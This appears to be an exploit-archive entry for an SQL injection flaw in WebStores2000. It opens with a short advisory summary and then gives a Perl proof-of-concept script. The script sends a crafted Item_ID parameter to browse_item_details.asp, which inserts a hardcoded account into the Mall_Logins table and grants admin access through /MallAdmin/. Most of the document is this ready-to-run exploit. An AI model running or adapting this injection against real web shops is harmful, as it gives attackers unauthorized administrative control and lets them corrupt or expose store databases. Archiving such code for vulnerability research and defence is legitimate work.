38 lines
No EOL
1.3 KiB
Perl
Executable file
38 lines
No EOL
1.3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/7766/info
|
|
|
|
This vulnerability is reportedly caused by a lack of sufficient sanitization of user-supplied data contained in URI parameters supplied to WebStores2000.
|
|
|
|
Successful exploitation may allow for modification of the structure of SQL queries, resulting in information disclosure, or database corruption.
|
|
|
|
#!/usr/bin/perl -w
|
|
#This exploit create user with Mall Admin priv.
|
|
#You can login via /MallAdmin/
|
|
$pamer = "
|
|
1ndonesian Security Team (1st)
|
|
==============================
|
|
http://bosen.net/releases/
|
|
|
|
ws2k-ex.pl, WebStore2000 SQL Injection Proof of Concept
|
|
Exploit by : Bosen
|
|
Discover by : Bosen
|
|
Greetz to : AresU, TioEuy, syzwz, TioEuy, sakitjiwa, muthafuka
|
|
all #hackers\@centrin.net.id/austnet.org";
|
|
|
|
use LWP::UserAgent;
|
|
use HTTP::Request;
|
|
use HTTP::Response;
|
|
$| = 1;
|
|
print $pamer;
|
|
if ($#ARGV<3){
|
|
print "\n Usage: perl ws2k-ex.pl <uri>\n\n";
|
|
exit;
|
|
}
|
|
my $legend = "$ARGV[0]/browse_item_details.asp?Item_ID=";
|
|
$legend .= "''; insert into Mall_Logins values ('bosen','gembel')--";
|
|
|
|
my $bosen = LWP::UserAgent->new();
|
|
my $gembel = HTTP::Request->new(GET => $legend);
|
|
my $dodol = $bosen->request($gembel);
|
|
if ($dodol->is_error()) { printf " %s\n", $dodol->status_line;
|
|
} else { print "Alhamdulillah :P\n"; }
|
|
print "\n680165\n"; |